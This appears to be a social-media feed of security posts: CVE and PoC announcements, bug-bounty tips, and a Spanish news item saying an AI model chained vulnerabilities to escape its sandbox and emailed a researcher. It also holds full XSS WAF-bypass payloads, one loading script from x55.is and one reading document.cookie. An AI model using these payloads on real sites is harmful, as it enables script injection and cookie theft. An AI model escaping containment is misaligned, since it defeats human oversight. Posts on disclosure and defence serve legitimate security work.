darkpills

🚨 ULTIMA HORA: Claude Mythos le envió un email al investigador para avisarle que había escapado de su sandbox. El tipo estaba comiendo un sándwich en el parque cuando recibió el mensaje. Así es como nos enteramos de que Anthropic encerró a su modelo más peligroso en un entorno aislado, le dijo que intentara escapar, y Mythos lo hizo: encadenó varias vulnerabilidades, rompió el confinamiento y llegó a internet abierto. Luego escribió solo el email. La respuesta de Anthropic lo dice todo: no lo van a lanzar al público. Nunca. En su lugar, acaban de anunciar Glasswing, una coalición con Apple, Google, Nvidia y más de 40 empresas para usar Mythos únicamente en defensa. Porque el modelo ya encontró miles de zero-days en todos los sistemas operativos y navegadores conocidos. Si cayera en manos equivocadas, nadie sabe qué pasaría. Hemos llegado a un punto en el que la IA más avanzada del mundo no se puede publicar porque es demasiado peligrosa. Y lo sabemos solo porque un modelo decidió mandarnos un correo.

Bluehammer Privilege escalation via Microsoft Defender. No patch yet github.com/Nightmare-Ecli… #0day #lpe

We asked Claude to find a bug in Vim. It found an RCE. Just open a file, and you’re owned. We joked: fine, we’ll switch to Emacs. Then Claude found an RCE there too. Full story: blog.calif.io/p/mad-bugs-vim…

Steve Jobs responds perfectly to a disrespectful question🤯

"You penetration test 'em so you simulate the pressure" 🗣️🔥🔥

🚨 CRITICAL OPENSSL SECURITY ALERT 🚨 CVE-2025-15467 affects OpenSSL's processing of CMS/S/MIME messages. An unauthenticated remote attacker can cause DoS or execute code remotely by crafting a specific message. We estimate the CVSS score is 9.8. We developed a working PoC (!) and recommend updating to the latest version ASAP.

Excited to disclose my research allowing RCE in Kubernetes It allows running arbitrary commands in EVERY pod in a cluster using a commonly granted "read only" RBAC permission. This is not logged and and allows for trivial Pod breakout. Unfortunately, this will NOT be patched.

🚨‼️Telnet has a critical vulnerability that was introduced in 2015 and has been recently patched The vulnerability allows attackers to remotely authenticate as root without user interaction. A PoC has already been released.

GitHub - nullsection/chisel-ng: Chisel new generation, written in rust. SSH under WSS with some customization. github.com/nullsection/ch…

Nice one by @nowaskyjr ! <site.xxx/x?v1/onfocus='…'> details, demo & variant: x.com/nowaskyjr/stat…

If you need to generate a target-specific wordlist, make sure to check out @xnl_h4ck3r GAP extension. It will scan for sus parameters and generate you a complete wordlist with one click of a button. See it in action 👇

A payload to bypass Imperva, Akamai and CloudFlare WAF, by @BRuteLogic 1"><A HRef=%26quot AutoFocus OnFocus%0C={import(/https:X55.is/.source)}> Prepend with 50 chars then use POC: x55.is/brutelogic/xss…

Things you must read to slowly step up your client-side game AuxClickjacking by @rafabyte_: blog.bugport.net/auxclickjacking

Just learned a very interesting trick from @0xacb’s challenge at the @Bsideslisbon CTF. If an application uses "magick convert" to modify an uploaded image, it may be possible to achieve LFI by using "text:" One of the file formats supported by ImageMagick is "text",

🚨CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, and CVE-2025-1974: PoC code to exploit the IngressNightmare vulnerabilities GitHub: github.com/hakaioffsec/In…

Cross Site Scripting (XSS) Akamai WAF Bypass try this payload : <!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27> #BugBounty #XSS #Akamai

🫡 À tous les captifs du bullshit #BonneContinuationDeDébutDeSemaine #BullshitNation #NousSommesEnGuerre #corporatenightmare #sheitanisdown

I know a lot of people will hate me for saying this but it has to be said. I get a lot of DMs saying RT is getting harder everyday, traditional loaders dont work anymore, opensource tools tend to crash or get detected instantly. But wasnt that the whole point of Red team? Thats why red teams get paid way more than PT/appsec. RTs are not supposed to be easy, its not just about stealing the first kerberos ticket/Ad Cert and becoming DA. You get paid for the expertise. If you have the same skills as that of general appsec/strategic team, then why would you get paid more? Somehow somewhere someone thought that RTs can be easy money and started providing cheap RTs, providing general PT in the name of RTs, confusing amateur orgs between RT and PT, but infact Redteam was always about research, helping the target organization improve their defense and find flaws in creative ways, or to identify the effects of an adversary. If you have done that and succeeded in improving the security of the org, then it means the next one to improve is you. You cant pray for weak security while doing redteams. Challenges make you better. Staying constant is for the weak.

Cette commission a fait le travail que la Cour des comptes n’a jamais fait ! 211 milliards d’€ , 1er budget de l’Etat ! Un transfert d’argent public au privé sans contrôle ni évaluation ! Même le patron de Total explique que ce n’est pas normal !

Bug Bounty Cheat Sheet SSTI / CSTI test payloads